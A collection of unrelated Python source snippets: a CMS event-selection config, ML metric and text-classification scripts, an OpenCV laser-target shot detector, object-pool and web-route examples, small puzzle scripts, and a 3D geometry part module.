        evtSelPrimaryEventVertex,
        evtSelPrimaryEventVertexQuality,
        evtSelPrimaryEventVertexPosition,

        # electron candidate selection
        evtSelElectronIdMin,
        #evtSelElectronIdMax,
        evtSelElectronAntiCrack,
        evtSelElectronEta, #default 2.1, switch to 2.4
        evtSelElectronPt, #now 10
        evtSelElectronIso,
        #evtSelElectronTrkIso,
        #evtSelElectronEcalIso,
        #evtSelElectronHcalIso,
        evtSelElectronTrk,
        #evtSelElectronTrkIP, #mmm... we used to cut on combined d0 significance!

        # muon candidate selection
        evtSelGlobalMuonMin,
        #evtSelGlobalMuonMax,
        evtSelMuonEta, #default 2.1, switch to 2.4
        evtSelMuonPt, #now 10
        evtSelMuonIso,
        #evtSelMuonTrkIso,
        #evtSelMuonEcalIso,
        #evtSelMuonHcalIso, #why not?
        evtSelMuonAntiPion,
        #evtSelMuonTrkIP, #mmm... we used to cut on combined d0 significance!

        # di-tau candidate selection
        evtSelDiTauCandidateForElecMuZeroCharge,
        #evtSelDiTauCandidateForElecMuAcoplanarity, #use it in case of no collinear approximation?
        evtSelDiTauCandidateForElecMuDPhi,
        #evtSelDiTauCandidateForElecMuImpParamSig,
        evtSelDiTauCandidateForElecMuOneLegPt,

        # met selection...
        evtSelMETMax,

        # jet candidate selection...
        evtSelJetMin, #default eta<2.1 too tight, need 2.4 for b-tagging
        evtSelJetMax,

        # b-tagging candidate selection...
        evtSelJetBtagMin,
        evtSelJetBtagMax
    ),

    # Histogram managers run on events passing the selection.
    analyzers = cms.VPSet(
        electronHistManager,
        muonHistManager,
        diTauCandidateHistManagerForElecMu,
        caloMEtHistManager,
        pfMEtHistManager,
        jetHistManager,
        vertexHistManager,
        triggerHistManager
    ),

    eventDumps = cms.VPSet(
        elecMuEventDump
    ),

    analysisSequence = elecMuAnalysisSequence
)
|
from numpy import array, int64, mean
from sklearn.metrics import accuracy_score,roc_auc_score
import pandas as pd
def calculate_metric(logits, y, threshold=0.5):
    """Bundle accuracy and AUC scores for a batch of multi-label logits."""
    return {
        'accuracy': accuracy_from_logits(logits, y, threshold),
        'auc': calculate_auc(logits, y),
    }
def accuracy_from_logits(logits, y, threshold=0.5):
    """Per-class and micro-averaged accuracy after thresholding the logits."""
    assert len(logits) == len(y)
    n_classes = len(logits[0])
    predictions = (array(logits) > threshold).astype(int64)
    targets = array(y)
    scores = {}
    for cls in range(n_classes):
        scores[cls] = accuracy_score(targets[:, cls], predictions[:, cls])
    # Flatten everything for the overall ("all") score.
    scores['all'] = accuracy_score(targets.reshape(-1), predictions.reshape(-1))
    return scores
def calculate_auc(logits, y):
    """Per-class and micro-averaged ROC-AUC for multi-label logits."""
    assert len(logits) == len(y)
    n_classes = len(logits[0])
    predictions = array(logits)
    targets = array(y)
    aucs = {}
    for cls in range(n_classes):
        aucs[cls] = get_roc_auc_score(targets[:, cls], predictions[:, cls])
    # Flatten everything for the overall ("all") score.
    aucs['all'] = get_roc_auc_score(targets.reshape(-1), predictions.reshape(-1))
    return aucs
def get_roc_auc_score(y, y_preds):
    """ROC-AUC that degrades to 0 instead of raising.

    sklearn raises ValueError when `y` contains a single class only.
    """
    try:
        return roc_auc_score(y, y_preds)
    except ValueError:
        return 0
def calculate_mean(metric_dic):
    """Average each metric across folds/batches.

    Accepts {metric_name: {key: [values...]}} and returns, per metric, the
    mean of every key's value list.
    """
    averaged = {}
    for name, per_key in metric_dic.items():
        averaged[name] = pd.DataFrame(per_key).mean().to_dict()
    return averaged
import cv2
import numpy as np
import glob
from tqdm import tqdm
import imutils
from ipsctarget import Targetipsc
class Range():
    """Laser-shot detection range.

    Lets the user mark IPSC targets on a webcam feed, then detects bright
    red dots (laser hits) and registers them on the corresponding target.
    Keys in the main loop: 't' mark a target, 'c' calibrate the red
    threshold, 'q' quit.
    """

    def __init__(self):
        """Init function
        """
        #class inits
        print("Initializing target")
        # Display scaling factors applied when showing frames for marking.
        self.re_scale_factor_x = 1.0
        self.re_scale_factor_y = 1.0
        # Minimum red-channel intensity (0-255) treated as a laser dot.
        self.red_threshold = 230
        # Corner points clicked for the target currently being defined.
        self.target_points = []
        self.targets = []
        # One display image per target, decorated with registered hits.
        self.target_image_set = []
        self.target_show = []
        # Debounce flag: True while a shot is still visible in the stream,
        # so one trigger pull is not counted on several frames.
        self.wait = False

    def callback(self, x):
        """Callback function

        Args:
            x (None): dummy input
        """
        pass

    def click(self, event, x, y, flags, param):
        """Mouse click function

        Args:
            event (int): signifies which mouse button is clicked (4 is LMB)
            x (int): pixelwise x coordinate of the click
            y (int): pixelwise y coordinate of the click
            flags ([type]): unused cv2 callback argument
            param ([type]): unused cv2 callback argument
        """
        #if click is detected
        if event == 4:
            #append coordinate to the list
            self.target_points.append((x,y))
            #write outs
            print("Point added")
            print("X : " + str(x))
            print("Y : " + str(y))

    def make_target(self, frame):
        """Make target function

        Args:
            frame (ndarray): given frame where user sets target boundries by clicking on the corners

        Keys: 'r' resets the clicked points, 'c' confirms the selection.
        """
        print("Please, mark the target")
        #copy image from the frame
        image = frame.copy()
        #create window and set mouse callback
        cv2.namedWindow("image")
        cv2.setMouseCallback("image", self.click)
        #resize image for viewing
        #image = cv2.resize(image, None, fx = self.re_scale_factor_x, fy = self.re_scale_factor_y)
        #while user chooses points of the field
        while True:
            #draw chosen points
            if len(self.target_points) > 0:
                for p in self.target_points:
                    cv2.circle(image, p, 3, (0, 0, 255), -1)
            cv2.imshow("image", image)
            key = cv2.waitKey(1) & 0xFF
            #reset points and image
            if key == ord('r'):
                self.target_points = []
                image = frame.copy()
                image = cv2.resize(image,
                                   None,
                                   fx=self.re_scale_factor_x,
                                   fy=self.re_scale_factor_y)
            #exit if done
            elif key == ord('c'):
                break
        # An IPSC target outline needs at least 8 clicked corner points
        # (NOTE(review): the original comment said 4 -- the code checks 8).
        if len(self.target_points) >= 8:
            #convert crop points back to full-resolution coordinates
            self.target_points = np.asarray(np.divide(self.target_points,
                                                      [self.re_scale_factor_x,
                                                       self.re_scale_factor_y]), int)
            #create target
            target = Targetipsc(self.target_points, len(self.targets))
            #append target to the list
            self.targets.append(target)
            #TODO #NEED TO CHANGE THIS: display image is a hard-coded file
            self.target_image_set.append(cv2.imread("ipsctarget1.jpg"))
        #reset target points
        self.target_points = []
        #reset all cv2 windows
        cv2.destroyAllWindows()

    def detect_shot(self, frame):
        """Function for detection of shots in the frame

        Args:
            frame (ndarray): a frame where the laser is detected

        Returns:
            tuple: coordinates of the shot, or None if no shot is detected,
            should probably change that
        """
        #checks if anything exists in a frame
        if frame.any() > 0:
            #extracts contours
            cnts = cv2.findContours(frame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
            cnts = imutils.grab_contours(cnts)
            #if contours exists
            if len(cnts) > 0:
                for c in cnts:
                    # ignore tiny contours (noise) with fewer than 4 points
                    if len(c) >= 4:
                        # compute the center of the contour
                        M = cv2.moments(c)
                        try:
                            cX = M["m10"] / M["m00"]
                            cY = M["m01"] / M["m00"]
                        except ZeroDivisionError:
                            return None
                        # first qualifying contour wins
                        return (cX, cY)
            else:
                return None

    def nothing(self, x):
        """Callback function for the trackbar, does nothing
        """
        pass

    def calibrate_red(self, cap):
        """Function for calibration of the red levels in the video stream

        Args:
            cap (cv2 video capture): capture stream from OpenCV

        Press 'q' to accept the current threshold and leave calibration.
        """
        #creates window and trackbar
        cv2.namedWindow("Calibration")
        cv2.createTrackbar('R', 'Calibration', self.red_threshold, 255, self.nothing)
        #status flag
        calibrate = True
        while calibrate:
            #read frame
            ret, frame = cap.read()
            #get red channel
            red_frame = np.array(frame[:, :, 2])
            #threshold the frame
            red_frame[red_frame < self.red_threshold] = 0
            #get trackbar position
            self.red_threshold = cv2.getTrackbarPos('R','Calibration')
            #show frame
            cv2.imshow('Calibration', red_frame)
            #detect keypress
            keypress = cv2.waitKey(1) & 0xFF
            #Break is q pressed
            if keypress == ord('q'):
                #stop calibration
                calibrate = False
        #destroy calibration window
        cv2.destroyWindow("Calibration")

    def run(self):
        """Main loop function
        """
        print("Running target")
        #open video capture
        cap = cv2.VideoCapture(0)
        #running flag
        running = True
        #main while loop
        while running:
            #read frame
            ret, frame = cap.read()
            #check if targets exist
            if len(self.target_image_set)>0:
                #show one window per marked target
                for idx, t_i in enumerate(self.target_image_set):
                    cv2.imshow("Target - {}".format(idx), t_i)
            else:
                cv2.imshow('frame', frame)
            #if no targets made
            if len(self.targets) == 0:
                print("Please, mark the targets")
            #if targets exists
            else:
                #get red channel
                red_frame = np.array(frame[:,:,2])
                #threshold the frame
                red_frame[red_frame < self.red_threshold] = 0
                #apply the mask
                #red_frame[self.target_mask<255] = 0
                #get shot status
                shot_status = self.detect_shot(red_frame)
                #if shot detected
                if shot_status is not None:
                    print("Shots detected!")
                    #check if it is the first detected frame (debounce)
                    if self.wait == False:
                        #set hit status
                        hit_status = False
                        #for each target in list
                        for idx, t in enumerate(self.targets):
                            #check if shot is inside the target
                            if t.inside_target(shot_status):
                                print("Target [{}] HIT".format(t.get_id()))
                                #self.target_image_set[idx] = t.get_target_image()
                                relative_shot = t.update_target(shot_status)
                                cv2.circle(self.target_image_set[idx],
                                           relative_shot,
                                           3,
                                           (0, 0, 255),
                                           -1)
                                hit_status = True
                        #check if hits were registered
                        if hit_status == False:
                            #if no hits was inside the target
                            print("Mike!")
                    #Check if this is correct
                    self.wait = True
                else:
                    self.wait = False
            keypress = cv2.waitKey(1) & 0xFF
            #Break is q pressed
            if keypress == ord('q'):
                break
            #make target if t is pressed
            elif keypress == ord('t'):
                self.make_target(frame)
            #calibrate red threshold
            elif keypress == ord('c'):
                self.calibrate_red(cap)
        # When everything done, release the capture
        cap.release()
        cv2.destroyAllWindows()


if __name__ == "__main__":
    t1 = Range()
    t1.run()
# Resource handed out by the object pools below.
class Resource:
    """A pooled resource with a simple Free/Using state."""

    # Default state before the resource is handed out.
    __value = 'Free'

    def reset(self):
        """Return the resource to its initial 'Free' state."""
        self.__value = 'Free'

    def setValue(self, tag):
        """Mark the resource as in use; the state becomes ('Using', tag).

        The parameter was renamed from `str`, which shadowed the builtin.
        """
        self.__value = 'Using', tag

    def getValue(self):
        """Current state: 'Free' or the tuple ('Using', tag)."""
        return self.__value
# Object pool #1: a singleton that hands out and reclaims Resource objects.
class ObjectPool1:
    # Resources ever created by this pool (ownership check on return).
    __child = list()
    # The singleton instance.
    __connection = None
    # Currently idle resources.
    __resources = list()

    def __init__(self):
        # Bugfix: the original `raise NotImplemented(...)` raised a
        # TypeError, because NotImplemented is a singleton, not an
        # exception class; also use identity comparison with None.
        if ObjectPool1.__connection is not None:
            raise NotImplementedError("This is a singleton class.")

    @staticmethod
    def getInstance():
        """Return the single shared pool, creating it on first use."""
        if ObjectPool1.__connection is None:
            ObjectPool1.__connection = ObjectPool1()
        return ObjectPool1.__connection

    def getResource(self):
        """Hand out an idle resource, creating a new one when none is free."""
        if len(self.__resources) > 0:
            print("Using existing resource.")
            # Remove it from the idle list while it is in use.
            return self.__resources.pop(0)
        else:
            print("Creating new resource.")
            res = Resource()
            # Track ownership so resources from another pool are rejected
            # on return.
            self.__child.append(res)
            return res

    def returnResource(self, resource):
        """Reclaim a resource previously handed out by this pool."""
        # Only accept resources this pool created.
        if resource in self.__child:
            print("\nReturn in Pool1")
            resource.reset()
            # Put it back on the idle list.
            self.__resources.append(resource)
        # Resources issued by another pool are refused.
        else:
            print("\nNot access to Pool1")
class ObjectPool2:
    """Second singleton object pool, independent of ObjectPool1."""

    # Every resource ever created by this pool.
    __child = list()
    # The singleton instance.
    __connection = None
    # Resources currently free for reuse.
    __resources = list()

    def __init__(self):
        # BUG FIX: `raise NotImplemented(...)` raised a TypeError because
        # NotImplemented is not callable; use NotImplementedError instead.
        if ObjectPool2.__connection is not None:
            raise NotImplementedError("This is a singleton class.")

    @staticmethod
    def getInstance():
        """Return the shared pool instance, creating it on first use."""
        if ObjectPool2.__connection is None:
            ObjectPool2.__connection = ObjectPool2()
        return ObjectPool2.__connection

    def getResource(self):
        """Hand out a free resource, creating a new one when none are free."""
        if self.__resources:
            print("Using existing resource.")
            return self.__resources.pop(0)
        else:
            print("Creating new resource.")
            res = Resource()
            self.__child.append(res)
            return res

    def returnResource(self, resource):
        """Accept a resource back, but only if this pool created it."""
        if resource in self.__child:
            print("\nReturn in Pool")
            resource.reset()
            self.__resources.append(resource)
        else:
            print("\nNot access to Pool")
def main():
    """Demonstrate that the two singleton pools track their own resources."""
    # Obtain both singleton pools and show their identities.
    pool1 = ObjectPool1.getInstance()
    pool2 = ObjectPool2.getInstance()
    print("Pool1", pool1, '\nPool2', pool2)

    # Acquire resources: two from pool 1, one from pool 2.
    one = pool1.getResource()
    two = pool1.getResource()
    three = pool2.getResource()

    # Tag each resource and show its state.
    one.setValue('1')
    two.setValue('2')
    three.setValue('3')
    print(f"{one} = {one.getValue()}")
    print(f"{two} = {two.getValue()}")
    print(f"{three} = {three.getValue()}")

    # Returning a pool-1 resource to pool 2 must be rejected.
    pool2.returnResource(one)
    print(f"{one} = {one.getValue()}")

    # Returning a pool-1 resource to its own pool succeeds and resets it.
    pool1.returnResource(two)
    print(f"{two} = {two.getValue()}")

    # Returning a pool-2 resource to pool 1 must be rejected.
    pool1.returnResource(three)
    print(f"{three} = {three.getValue()}")

    # Acquire again from both pools and re-tag.
    one = pool2.getResource()
    two = pool1.getResource()
    three = pool2.getResource()
    one.setValue('4')
    two.setValue('5')
    three.setValue('6')
    print(f"{one} = {one.getValue()}")
    print(f"{two} = {two.getValue()}")
    print(f"{three} = {three.getValue()}")
if __name__ == "__main__":
main()
|
import numpy
from numpy import array
from numpy import asarray
from numpy import zeros
import pandas as pd
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from keras.preprocessing.text import Tokenizer
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
from matplotlib import pyplot as plt
from keras import optimizers
from sklearn.metrics import classification_report
from keras.models import Model
from keras.layers import Input, Dense, Embedding, concatenate, Flatten
from keras.layers import Dense, SimpleRNN, GRU, LSTM, Embedding
from keras.layers import CuDNNGRU, Bidirectional, GlobalAveragePooling1D, GlobalMaxPooling1D
from keras.models import Sequential
from keras.preprocessing import text, sequence
from sklearn.metrics import f1_score
# --- Data loading -------------------------------------------------------
train = pd.read_csv('train_75.csv')
test = pd.read_csv('valid_25.csv')

maxlen = 150
max_features = 50000
embedding_size = 300

# Replace missing questions with a placeholder token.
X_train = train["question_text"].fillna("dieter").values
X_test = test["question_text"].fillna("dieter").values
y_train = train["target"]
y_test = test["target"]

# --- Tokenisation and padding ------------------------------------------
t = Tokenizer()
t.fit_on_texts(list(X_train) + list(X_test))
vocab_size = len(t.word_index) + 1
X_train = t.texts_to_sequences(X_train)
X_test = t.texts_to_sequences(X_test)
X_train = sequence.pad_sequences(X_train, maxlen=maxlen)
X_test = sequence.pad_sequences(X_test, maxlen=maxlen)

# --- Pre-trained word embeddings ---------------------------------------
# BUG FIX: the embeddings file was opened without a context manager and the
# handle was only closed on the happy path; `with` guarantees closure.
embeddings_index = dict()
with open('GoogleNews-vectors-negative300.txt') as f:
    for line in f:
        values = line.split()
        word = values[0]
        coefs = asarray(values[1:], dtype='float32')
        embeddings_index[word] = coefs

# Build the embedding matrix; rows of unknown words stay zero.
embedding_matrix = zeros((vocab_size, 300))
for word, i in t.word_index.items():
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None:
        embedding_matrix[i] = embedding_vector

# --- Model: frozen embeddings + two dense layers + sigmoid output -------
model = Sequential()  # initialize a sequential network
model.add(Embedding(vocab_size, 300, weights=[embedding_matrix], input_length=maxlen, trainable=False))
model.add(Flatten())
model.add(Dense(200, activation='relu'))
model.add(Dense(200, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
print(model.summary())

model.fit(X_train, y_train, epochs=1, batch_size=500)

# --- Evaluation ---------------------------------------------------------
# BUG FIX: `print "4"` and `print f1_score(...)` were Python 2 print
# statements in an otherwise Python 3 style script; use the function form
# (which behaves identically under Python 2 as well for these calls).
print("4")
y_pred = model.predict_classes(X_test)
print(f1_score(y_test, y_pred))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _env # noqa
from _base import BaseHandler, LoginHandler
from misc._route import route
@route('/login')
class Login(BaseHandler):
    """Serve the login page at GET /login."""
    def get(self):
        # Render the handler's default template.
        self.render()
@route('/reg')
class Reg(BaseHandler):
    """Serve the registration page at GET /reg."""
    def get(self):
        # Render the handler's default template.
        self.render()
@route('/')
class Index(BaseHandler):
    """Serve the site index page at GET /."""
    def get(self):
        # Render the handler's default template.
        self.render()
@route('/course')
class Course(BaseHandler):
    """Serve the course page at GET /course."""
    def get(self):
        # Render the handler's default template.
        self.render()
@route('/logout')
class Logout(LoginHandler):
    """Log the user out at GET /logout."""
    def get(self):
        # Drop the session cookie, then send the user back to the index.
        self.clear_cookie('user')
        self.redirect('/')
|
mInput = raw_input()
message = ''
for i in range(len(mInput)):
if mInput[i] in ['a','e','i','o','u','A','E','I','O','U'] and i % 2 == 0:
message += 'A'
elif mInput[i] in ['a','e','i','o','u','A','E','I','O','U'] and i % 2 == 1:
message += 'a'
else:
message += mInput[i]
print message
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 5 19:03:40 2021
@author: PC
"""
import pandas as pd
import numpy as np
np.random.seed(456)
import re
from tqdm import tqdm
import matplotlib.pyplot as plt
import os
import json
from konlpy.tag import Okt
import sklearn
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import log_loss, accuracy_score,f1_score
import tensorflow as tf
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint
from transformers import BertTokenizer, BertModel, TFBertModel
from transformers import BertConfig, BertForSequenceClassification
from transformers import AdamW
from transformers import AutoTokenizer, AutoModel
from transformers import BertTokenizer, BertModel
from tokenization_kobert import KoBertTokenizer
from transformers import BertModel, DistilBertModel
# Restrict TensorFlow to the first GPU only (if any GPUs are present).
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
    try:
        tf.config.experimental.set_visible_devices(gpus[0], 'GPU')
    except RuntimeError as e:
        # Visible devices must be configured before program startup;
        # if it is too late, just report the error.
        print(e)
# Load the competition data; paths are relative to the parent directory.
train=pd.read_csv('../train.csv')
test=pd.read_csv('../test.csv')
sample_submission=pd.read_csv('../sample_submission.csv')
# Keep only the columns used to build the model input
# (project title, research summary, Korean keywords, and the label).
train=train[['과제명', '요약문_연구내용','요약문_한글키워드','label']]
test=test[['과제명', '요약문_연구내용','요약문_한글키워드']]
# Replace missing summaries/keywords with a literal 'NAN' marker string.
train['요약문_연구내용'].fillna('NAN', inplace=True)
test['요약문_연구내용'].fillna('NAN', inplace=True)
train['요약문_한글키워드'].fillna('NAN', inplace=True)
test['요약문_한글키워드'].fillna('NAN', inplace=True)
# Concatenate title + summary + keywords into a single 'data' text column.
train['data']=train['과제명']+train['요약문_연구내용']+train['요약문_한글키워드']
test['data']=test['과제명']+test['요약문_연구내용']+test['요약문_한글키워드']
# data label
train.index = range(0, len(train))
# Cleaning passes: strip punctuation/special characters, escaped newlines and
# tabs, signed digits, and finally anything outside the Hangul ranges.
train['data'] = train['data'].str.replace(r'[-=+,#/\?:^$.@*\"※~>`\'…》\\n\t]+', " ", regex=True)
test['data'] = test['data'].str.replace(r'[-=+,#/\?:^$.@*\"※~>`\'…》]', " ", regex=True)
train['data'] = train['data'].str.replace(r'\t+', " ", regex=True)
test['data'] = test['data'].str.replace(r'\t+', " ", regex=True)
train['data'] = train['data'].str.replace(r'[\\n]+'," ", regex=True)
test['data'] = test['data'].str.replace(r'[\\n]+'," ", regex=True)
train['data'] = train['data'].str.replace(r'[-+]?\d+'," ", regex=True)
test['data'] = test['data'].str.replace(r'[-+]?\d+'," ", regex=True)
train['data'] = train['data'].str.replace("[^가-힣ㄱ-하-ㅣ]", " ", regex=True)
test['data'] = test['data'].str.replace("[^가-힣ㄱ-하-ㅣ]", " ", regex=True)
print(train.head(5))
print(test.head(5))
# Tokenizer for the pretrained KoBERT model.
tokenizer = KoBertTokenizer.from_pretrained('monologg/kobert')
import collections
def convert_data(data_df):
    """Convert a dataframe into BERT inputs ([tokens, masks, segments]) and targets.

    Uses module globals: `tokenizer`, DATA_COLUMN and LABEL_COLUMN.
    Returns ([tokens, masks, segments], targets) as numpy arrays.
    """
    global tokenizer
    SEQ_LEN = 512  # length of the input sequence fed to BERT
    tokens, masks, segments, targets = [], [], [], []
    for i in tqdm(range(len(data_df))):
        # Tokenize the sentence, padded/truncated to SEQ_LEN, then map to ids.
        # token = tokenizer.encode(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
        token = tokenizer.tokenize(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
        token = tokenizer.convert_tokens_to_ids(token)
        # Attention mask: 1 for real tokens, 0 for padding.
        # NOTE(review): this counts id 0 anywhere in the sequence — assumes id 0
        # is used only for padding; confirm against the tokenizer's vocab.
        num_zeros = token.count(0)
        mask = [1]*(SEQ_LEN-num_zeros) + [0]*num_zeros
        # Segment ids are all 0 because there is only a single sentence.
        segment = [0]*SEQ_LEN
        # Collect the BERT inputs for this row.
        tokens.append(token)
        masks.append(mask)
        segments.append(segment)
        # Store the integer label for this row.
        targets.append(data_df[LABEL_COLUMN][i])
    # Convert the accumulated lists to numpy arrays.
    tokens = np.array(tokens)
    masks = np.array(masks)
    segments = np.array(segments)
    targets = np.array(targets)
    return [tokens, masks, segments], targets
def convert_data2(data_x, data_y):
    """Build BERT inputs from already-tokenized sequences and one-hot labels.

    NOTE(review): relies on a module global `max_len` that is not defined in
    this file's visible code — confirm it is set before this is called.
    """
    global tokenizer
    global max_len
    SEQ_LEN = max_len  # length of the input sequence fed to BERT
    tokens, masks, segments, targets = [], [], [], []
    for i in tqdm(range(len(data_x))):
        # The sequences are already tokenized/padded; take the row as-is.
        # token = tokenizer.encode(data_df[DATA_COLUMN][i], max_length=SEQ_LEN, pad_to_max_length=True)
        token = data_x[i]
        # Attention mask: 1 for real tokens, 0 for padding positions.
        num_zeros = (token == 0).sum() #token.count(0)
        # print(num_zeros, token)
        mask = [1]*(SEQ_LEN-num_zeros) + [0]*num_zeros
        # Segment ids are all 0 because there is only a single sentence.
        segment = [0]*SEQ_LEN
        # Collect the BERT inputs for this row.
        tokens.append(token)
        masks.append(mask)
        segments.append(segment)
        # Labels arrive one-hot encoded; store the class index.
        targets.append(np.argmax(data_y[i]))
    # Convert the accumulated lists to numpy arrays.
    tokens = np.array(tokens)
    masks = np.array(masks)
    segments = np.array(segments)
    targets = np.array(targets)
    return [tokens, masks, segments], targets
# 위에 정의한 convert_data 함수를 불러오는 함수를 정의
def load_data(pandas_dataframe):
    """Coerce column dtypes, then convert the frame into BERT inputs and targets."""
    frame = pandas_dataframe
    frame[DATA_COLUMN] = frame[DATA_COLUMN].astype(str)
    frame[LABEL_COLUMN] = frame[LABEL_COLUMN].astype(int)
    return convert_data(frame)
# 위에 정의한 convert_data 함수를 불러오는 함수를 정의
def load_data2(data_x, data_y):
    """Thin wrapper that delegates straight to convert_data2."""
    return convert_data2(data_x, data_y)
SEQ_LEN = 512
BATCH_SIZE = 20
# Column holding the text to classify.
DATA_COLUMN = "data"
# Column holding the integer class label.
LABEL_COLUMN = "label"
# Convert the training frame into BERT inputs and targets.
# BUG FIX: load_data returns (inputs, targets) in that order; the original
# `train_y1, train_x1 = load_data(train)` swapped them, so the targets were
# fed to the model as input. Unpack in the correct order.
train_x1, train_y1 = load_data(train)
train_x = tf.ragged.constant(train_x1)
train_y = tf.ragged.constant(train_y1)
# Earlier attempts (kept as notes):
# 'tuple' object has no attribute 'astype'
# ValueError: could not broadcast input array from shape (174304,512) into shape (174304
#train_x = tf.convert_to_tensor(train_x1, dtype=tf.float32)
#train_y = tf.convert_to_tensor(train_y1, dtype=tf.float32)
print("...................................................")
print(train_x.dtype)
print(train_y.dtype)
def create_sentiment_bert():
    """Build and compile the KoBERT-based 46-class softmax classifier."""
    # Load the pretrained BERT model (weights converted from PyTorch).
    model = TFBertModel.from_pretrained("monologg/kobert", from_pt=True)
    # Define the token, mask and segment input layers.
    token_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_word_ids')
    mask_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_masks')
    segment_inputs = tf.keras.layers.Input((SEQ_LEN,), dtype=tf.int32, name='input_segment')
    # Model input is [tokens, masks, segments].
    bert_outputs = model([token_inputs, mask_inputs, segment_inputs])
    dnn_units = 256 #256
    DROPOUT_RATE = 0.2
    # Take the second output — presumably the pooled representation;
    # confirm against the installed transformers version.
    bert_outputs = bert_outputs[1]
    # sentiment_first = tf.keras.layers.Dense(3, activation='softmax', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(bert_outputs)
    mid_layer = tf.keras.layers.Dense(dnn_units, activation='relu', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(bert_outputs)
    mid_layer2 = tf.keras.layers.Dropout(rate=DROPOUT_RATE)(mid_layer)
    sentiment_first = tf.keras.layers.Dense(46, activation='softmax', kernel_initializer=tf.keras.initializers.TruncatedNormal(0.02))(mid_layer2)
    sentiment_model = tf.keras.Model([token_inputs, mask_inputs, segment_inputs], sentiment_first)
    # Adam optimizer; labels are integer class ids, hence the sparse loss.
    sentiment_model.compile(optimizer=tf.keras.optimizers.Adam(lr=0.00001), loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False),
                            metrics=['sparse_categorical_accuracy'])
    return sentiment_model
# Sanity-check the converted tensors' dtypes before training.
print(train_x.dtype)
print(train_y.dtype)
num_epochs = 1
batch_size = 6
sentiment_model = create_sentiment_bert()
# Train without shuffling, then persist the learned weights.
sentiment_model.fit(train_x, train_y, epochs=num_epochs, shuffle=False, batch_size=batch_size)
sentiment_model.save_weights(os.path.join("sentiment_model.h5"))
|
from collections import Counter
n = int(input())
# t[i]: current value tracked for item i.
# d[i]: whether item i was ever *replaced* by a different positive value
#       (as opposed to merely adjusted by a delta).
t = [0] * n
d = [False] * n
e = 0
for i in range(n):
    # The first token of each line is a count and is dropped; the remaining
    # tokens are the initial value followed by a series of operations.
    op = list(map(int, input().split()))[1:]
    t[i] = op[0]
    for j in op[1:]:
        if j > 0:
            # A positive operation sets an absolute value; record a change
            # when it differs from the current one.
            if j != t[i]:
                d[i] = True
            t[i] = j
        else:
            # Non-positive operations are relative deltas.
            t[i] += j
# Count windows of three consecutive "changed" items, treating the list as
# circular: the two checks after the loop handle the wrap-around windows.
for i in range(1, n - 1):
    if d[i - 1] and d[i] and d[i + 1]:
        e += 1
if d[-1] and d[0] and d[1]:
    e += 1
if d[-2] and d[-1] and d[0]:
    e += 1
# NOTE(review): for n < 3 the wrap-around checks reuse elements via negative
# indexing and can double-count — confirm the input guarantees n >= 3.
print(sum(t), Counter(d)[True], e)
|
'''
You're a professor teaching Data Science with Python, and you want to visually assess if the grades on your exam follow a particular distribution. Which plot do you use?
'''
# ANSWER
# HISTOGRAM
|
"""
Contains classes used to describe 3d geometry parts
Remark: normally part objects are an ideal candidate for dataclasses, but geometry is a
special case because we need to inherit a base class with a default parameter (namely
virtual), and dataclasses don't play well with that inheritance
"""
from typing import List, Optional
from enum import Enum
from qmt.infrastructure import write_deserialised
class Geo3DPart:
    def __init__(self, label: str, fc_name: Optional[str], virtual: bool = False):
        """Base class for a 3D geometric part.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
            The name of the 2D/3D freeCAD object that this is built from. Note that if the
            label used for the 3D part is the same as the freeCAD label, and that label is
            unique, None may be used here as a shortcut.
        virtual : bool
            Whether the part is virtual or not
            (Default value = False)
        """
        self.built_fc_name: Optional[str] = None  # This gets set on geometry build
        self.fc_name = fc_name
        self.label = label
        self.serial_stl: Optional[str] = None  # This gets set on geometry build
        self.serial_stp: Optional[str] = None  # This gets set on geometry build
        self.virtual = virtual

    def write_stp(self, file_path=None):
        """Write part geometry to a STEP file.

        Returns the STEP file path.

        Parameters
        ----------
        file_path : str
            (Default value = None; defaults to "<label>.stp")

        Returns
        -------
        file_path
        """
        if file_path is None:
            file_path = f"{self.label}.stp"
        write_deserialised(self.serial_stp, file_path)
        return file_path

    def write_stl(self, file_path=None):
        """Write part geometry to an STL file.

        Returns the STL file path. (Docstring fixed: this method writes the
        serialised STL data, not STEP.)

        Parameters
        ----------
        file_path : str
            (Default value = None; defaults to "<label>.stl")

        Returns
        -------
        file_path
        """
        if file_path is None:
            file_path = f"{self.label}.stl"
        write_deserialised(self.serial_stl, file_path)
        return file_path
class ExtrudePart(Geo3DPart):
    def __init__(
        self,
        label: str,
        fc_name: str,
        thickness: float,
        z0: float = 0.0,
        virtual: bool = False,
    ):
        """A 3D part produced by extruding a 2D profile.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
            The name of the 2D/3D freeCAD object that this is built from. If the
            3D part's label equals a unique freeCAD label, None may be passed
            as a shortcut.
        thickness : float
            The extrusion thickness.
        z0 : float
            The starting z coordinate.
            (Default value = 0.0)
        virtual : bool
            Whether the part is virtual or not.
            (Default value = False)
        """
        super().__init__(label, fc_name, virtual=virtual)
        self.thickness = thickness
        self.z0 = z0
class WirePart(Geo3DPart):
    def __init__(
        self,
        label: str,
        fc_name: str,
        thickness: float,
        z0: float = 0.0,
        virtual: bool = False,
    ):
        """A hexagonal wire part.

        Parameters
        ----------
        label : str
            The descriptive name of this new part.
        fc_name : str
